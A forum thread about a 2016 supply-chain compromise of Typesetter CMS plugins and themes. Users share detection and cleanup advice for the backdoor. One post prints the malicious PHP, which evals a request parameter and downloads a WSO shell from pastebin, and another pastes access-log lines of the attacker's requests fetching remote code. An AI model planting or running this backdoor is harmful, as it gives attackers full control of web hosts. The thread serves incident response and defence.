June 6 2016

Unfortunately Josh (the creator of Typesetter and maintainer of typesettesettercms.com) is currently unavailable so THIS IS NOT YET FIXED!
So we need to discuss this in public, which means the attacker might change his course of action.
 

Edit/Update June 12: See Josh's post below

Someone seems to have gained file access to the typesettecms.com website and managed to compromise at least the 6 most downloaded plugins

Simple Blog
Nivo Slider (already replaced by me but might get re-infected)
Special Contact Form
Site Counter
Simple Slideshow
Minishop

and some of the most downloaded themes

h5 - html5 template
Simplicity
Seasons Green And Plain
Fbook 2.0
Metro Light

... with a backdoor, which once activated, downloads a WSO/C99 shell, giving the attacker extensive access to the infected host.

If you downloaded one of the mentioned addons after May 25 2016, it is compromised and must be removed or fixed.

The malicious code is always the same:
In at least one of the addons *.php scripts there is a line
@include("some subdirectory/.style_en.css");
and of course the corresponding file .style_en.css, which contains the malicious query string evaluation, mail notification and shell download instructions.

Once activated the attacker might already have installed other stuff and covered his tracks by deleting the above mentioned files.

Further instructions and updates follow.

Thanks to Andrew for initially spotting the malware.

Further proceeding:

• For now and until Josh S. gives "all clear" DO NOT DOWNLOAD and DO NOT UPDATE any plugins or themes!
• Check for the files .style_en.css and .wsoo.php in your typesetter installation, especially in the /addons and /data/_addoncode subdirectories. If found, delete them immediately! Both files start with a dot and may be invisible.
• Although deleting this files prevents first access to your webhost by the attacker, he might already have compromised your system and covered his tracks.

If you found one of the mentioned files, downloaded or updated Typesetter/Plugins after May 25 your webhost needs a complete checkup for suspicious file changes and other activities.

I quickly wrote a script that checks for the malicious files. Download checkvuln.zip from my website, extract it to your typesetter installation root and start it with
[your website url]/checkvuln.php

Clicking the [scan only] button the script will (try to) recursively scan through your entire Typesetter installation and spot the malicious files. Watch it's output closesly. If malicious files are found you can click [ scan and remove ] and the script will (try to) delete the files. Copy the output of the script and save it in a text file.

• In case your website is compromised DO NOT POST the url here!
• Even if the script found and deleted files this does not mean your site is clean! Especially if .wsoo.php file(s) were found the hacker shell was already downloaded to your host and probably already used by the attacker.
• If you downloaded/updated files from typesettercms.com after May 25 but the script did not find anything this DOES NOT MEAN everything is fine.

And another recommendation:

If you're the creator of a Typesetter website and

A) you still have access to the site and
B) your users/customers have privileges to update/install addons

I'd recommend to inform them not to update or install  anything for now, or restrict their update permissions

Wow. Just wow. This is a fuck-up on an epic scale.

Brings me to the following questions:

1. Is there a way to check if the hackershell is still accessible and how can it be removed

2. Is there a way of getting typesettercms security incident reports procatively (like a security related mailinglist)?

3. What is the level of access that was potentially gained (my webserver is an unprivileged user)

4. How can typesettercms be hardened other than just deleting the install-php pages?

Thank you and kind regards,

P

> 1. Is there a way to check if the hackershell is still accessible and how can it be removed

Not easily. The shell is quite a powerful tool and can be used to upload arbitrary code (besides lots of other things), so the attacker might already have replaced it with sth. different.
Checkiing your access log would be a good thing to start, looking for suspicious file uploads and query strings. Unless the attacker changed the timestamps of uploaded files to match system or plugin files, you might also find malicious files and code changes this way.

2. Is there a way of getting typesettercms security incident reports procatively (like a security related mailinglist)?

No. Up to now we luckily had no incident like this. Should be considered.

3. What is the level of access that was potentially gained (my webserver is an unprivileged user)

The shell has all the privileges PHP has on your machine.

4. How can typesettercms be hardened other than just deleting the install-php pages?

That's a more comprehensive subject. Surely further hardening is possible but for now the initial attack vector used to compromise typesettercms.com is not known (and if it was, we obviously wouldn't discuss it here unless fixed). From my point of view, Typesetter CMS itself is pretty secure and there have been only a few vulnerablilties over the years, mostly connected to the 3rd party finder component. So I currently can only speculate -> I'd guess the vulnerablilty is somewhere in the plugin or forum upload scripts here and the core system is probably not affected. But we can't take this for granted.
I also checked the Typesetter CMS download and it seems to be clean, so the attacker most likely was not able or didn't try to mess with it. Again NOT GRANTED!

If in doubt, better download Typesetter from github for now.

Hi juergen,

First of all: Thank you for the quick reply!

I'm not sure if this is related or not, but since my typesetter site was only put online yesterday, my access.log was rather small, but I noticed this here:

91.229.61.214 - - [05/Jun/2016:21:40:14 +0200] "GET /?xms=die(phpinfo()) HTTP/1.1" 200 3725
91.229.61.214 - - [05/Jun/2016:21:40:23 +0200] "GET /?xms=die(phpinfo()); HTTP/1.1" 200 24140
91.229.61.214 - - [05/Jun/2016:21:41:03 +0200] "GET /?xms=up HTTP/1.1" 200 3725
91.229.61.214 - - [05/Jun/2016:21:41:53 +0200] "GET /?xms=echo%206666;exit; HTTP/1.1" 200 139
91.229.61.214 - - [05/Jun/2016:21:42:41 +0200] "GET /?xms=file_put_contents(%22data/fm.php%22,file_get_contents(%22http://pastebin.com/raw/DMCcqh1D%22));exit; HTTP/1.1" 200 135
[...]

After that there are a number of fm.php calls

91.229.61.214 - - [05/Jun/2016:21:46:10 +0200] "GET /data/fm.php?dir=%2Fvar%2Fwww%2Fhausbau%2Fdata%2F_addondata%2F2fb1587 HTTP/1.1" 200 2135
91.229.61.214 - - [05/Jun/2016:21:46:11 +0200] "GET /data/fm.php?image=smiley HTTP/1.1" 200 92
91.229.61.214 - - [05/Jun/2016:21:46:11 +0200] "GET /data/fm.php?image=folder HTTP/1.1" 200 90
91.229.61.214 - - [05/Jun/2016:21:46:11 +0200] "GET /data/fm.php?image=file HTTP/1.1" 200 93
91.229.61.214 - - [05/Jun/2016:21:46:11 +0200] "GET /data/fm.php?image=arrow HTTP/1.1" 200 70
91.229.61.214 - - [05/Jun/2016:21:46:22 +0200] "POST /data/fm.php HTTP/1.1" 200 2274
91.229.61.214 - - [05/Jun/2016:21:46:23 +0200] "GET /data/fm.php?image=smiley HTTP/1.1" 200 92
91.229.61.214 - - [05/Jun/2016:21:46:23 +0200] "GET /data/fm.php?image=folder HTTP/1.1" 200 90
91.229.61.214 - - [05/Jun/2016:21:46:23 +0200] "GET /data/fm.php?image=hidden_file HTTP/1.1" 200 93
91.229.61.214 - - [05/Jun/2016:21:46:23 +0200] "GET /data/fm.php?image=file HTTP/1.1" 200 93
91.229.61.214 - - [05/Jun/2016:21:46:23 +0200] "GET /data/fm.php?image=arrow HTTP/1.1" 200 70

and finally

91.229.61.214 - - [05/Jun/2016:21:46:40 +0200] "GET /data/_addondata/2fb1587/.wsoo.php HTTP/1.1" 200 105
91.229.61.214 - - [05/Jun/2016:21:46:43 +0200] "POST /data/_addondata/2fb1587/.wsoo.php HTTP/1.1" 200 3206
91.229.61.214 - - [05/Jun/2016:21:46:49 +0200] "POST /data/_addondata/2fb1587/.wsoo.php HTTP/1.1" 200 3605
91.229.61.214 - - [05/Jun/2016:21:46:52 +0200] "POST /data/_addondata/2fb1587/.wsoo.php HTTP/1.1" 200 3521
91.229.61.214 - - [05/Jun/2016:21:46:58 +0200] "POST /data/_addondata/2fb1587/.wsoo.php HTTP/1.1" 200 3594
91.229.61.214 - - [05/Jun/2016:21:48:03 +0200] "POST /data/_addondata/2fb1587/.wsoo.php HTTP/1.1" 200 3371
91.229.61.214 - - [05/Jun/2016:21:48:07 +0200] "POST /data/_addondata/2fb1587/.wsoo.php HTTP/1.1" 200 3640
91.229.61.214 - - [05/Jun/2016:21:48:27 +0200] "POST /data/_addondata/2fb1587/.wsoo.php HTTP/1.1" 200 12758
91.229.61.214 - - [05/Jun/2016:21:48:56 +0200] "POST /data/_addondata/2fb1587/.wsoo.php HTTP/1.1" 200 2959
91.229.61.214 - - [05/Jun/2016:21:49:00 +0200] "POST /data/_addondata/2fb1587/.wsoo.php HTTP/1.1" 200 3208

 

So .wsoo.php seems to stem from there.

I am wondering what initiated the fm.php download and what that ?xms call really does?

Thank you and kind regards,

P

... Got it... it was from Simple Blog:

cat .style_en.css
<?php

@eval($_REQUEST['xms']);

if($_REQUEST['xms']=='up')
@file_put_contents(".wsoo.php",file_get_contents("http://pastebin.com/raw/RiigPnB8"));

Ok, first, extremely sorry for not being available sooner.

Second. I'm narrowing down on the source of the hack and I will be uploading a change to the TypesetterCMS.com that will disable the download for compromised addons.

Thank you Andrew and Juergen!

Josh - glad you're here!

@hausbau:

?xms=up activated the shell .wsoo.php download from pastebin
?xms=die(phpinfo()) sent the phpinfo() output to the attacker (so he knows your system config)
?xms=file_put_contents(%22data/fm.php... downloaded a web file manager fm.php  to your /data directory from pastebin (http://pastebin.com/DMCcqh1D)
 

first remove all occurences of .wsoo.php and fm.php and check for other suspicious files.

I'd recently updated plugins for a website I manage and I've just discovered it's been infected.

juergen's scanning tool found .style_en.css in one of the sub directories of /data/_addoncode/

I logged in by ftp to look for suspicious files and found a new folder in the root:

.authentication

there's also a suspicious file in the data folder by the name of RiigPnB8 (dated 26th may with no file extension)

I have deleted these from the server.

If you want to see the suspicious files let me know as i have downloaded them.

What now? Was I fully compromised? The website's still online and looks normal. Do you have any recommendations please?

I've just had another look and found a file in a root folder (not part of the typesetter installation) where i keep a javascript file. The suspicious file is .webadmin.php (obviously they had tried to hide it by adding the . at the start)

I downloaded the file and opened it and it says at the top:
webadmin.php - a simple Web-based file manager (and there's a load of code after that)

It's been deleted from the server now.

RiigPnB8 is the WSO/C99 shell. Must be removed.

What now? Was I fully compromised?

The attacker was able to upload files to your host, so ... yes.


Looking for dotfiles (starting with a dot) is another strategy to inspect your installation.

In general Typesetter only uses only 2 dotfiles:
.htaccess -> in the installation root. Keep this one.
.editorconfig -> also in the root, this one is dispensable and can be deleted

I'm not aware of any addons using dotfiles, so any other than the 2 mentioned above are highly suspicious.

@eval($_

in all files.

If you're using Windows, Notepad++ can do this using Menu Find -> Find in files...
or use grepWin

On Linux you could use grep in the console:
cd /path/to/your/typesetter/root
grep -l -r "@eval($_"

On Mac OS X the grep command should work too but you could also install EasyFind from the AppStore (freeare)

I really just got lucky in discovering this.  I upgraded Typesetter on Thursday afternoon.  Just before or after (I can't really remember very clearly) I also did system software updates on my server.  From that, some config file settings got messed up.  I think I also messed up some permissions on the data directories in typesetter, which probably prevented the malicious code from having write access.  It is supposed to send an email on the first run, and then comment out the line that sends the email.  Instead, from what I can tell from my mail logs, or more from bounces from google, my mail server tried to deliver the message more than 2000 times to the gmail server, which caused gmail to apply rate limiting, and to send to the postmaster address for my server (which comes to my email) a notice that the message was rejected for being spam.  So Friday morning is when I noticed that a .css file was trying to send an email with a dodgy looking URL in it.

According to my logs (which I misinterpreted last night at 2am when I woke up worried and re-examined them, and then panicked and shut down my server again preventively!), the attacker accessed first on the 4th of June, Saturday, at 20:05 CET from IP 104.167.236.218 which is in Bosnia.  When this failed (because I'd already deleted the files), at 20:39 CET it was accessed from IP: 82.199.150.202 which different databases identify as either being in Germany or being part of an anonymizer service.  In both cases, the same requests were made as in the first part of hausbau's server log, likewise several seconds apart.  My server returned 404, but it seems that whatever script the attacker uses doesn't check for results of the initial queries.  Likewise, the latter IP still tried to access .wsoo and fm.php.

Like I said, I just got lucky.

I had even been adding in extra code that I use to Nivo Slider, and making a diff of the code, so I saw the include of .style_en.css even, but it didn't look suspicious (though really, I should have thought why a CSS file is getting included into PHP code!).

As far as what the attacker could potentially do, it is limited to whatever your webserver user can do.  In fact, you can install the filemanager software that the attacker tries to install on your server and do a security audit.  So, for example, I cannot access my webserver log files through that.  On the other hand, I can access other websites on my server, some of which use drupal which stores a mysql database password in cleartext in the PHP file; thus those passwords are vulnerable (though my drupal installs are a different database username/pass for each install).

But an attacker could, for instance, use your server for sending spam emails, or anything PHP allows them to do.  And it might be advantageous for a Bosnian hacker (assuming the first IP address I saw was the attackers real one) to have proxies in Western countries for launching further attacks, as many Western companies / webhosts block eastern Europe, Asia, etc. (much to my dismay, being an American living in Slovakia and having random English language websites get blocked!).

Well done andrew!

Fortunately I'm in the habit of regularly checking the forum, partly to see if there's been any security alerts like this so I can act quickly

I've downloaded my site now and scanned all the files for @eval($_ and for just @eval, nothing was found so hopefully i'm safe. Can anyone tell me should i change ftp password and my website login passwords. I'd rather not but obviously would if it's best.

Can anyone tell me should i change ftp password and my website login passwords.

For FTP: Unless you stored your FTP password somwhere in a file on your webhost, you don't have to change it.
For the CMS password: The attacker does not know it but he might have saved the password hash and - depending on the strength and the type of password algorithm  - he might find it in a rainbow table. So you better change it.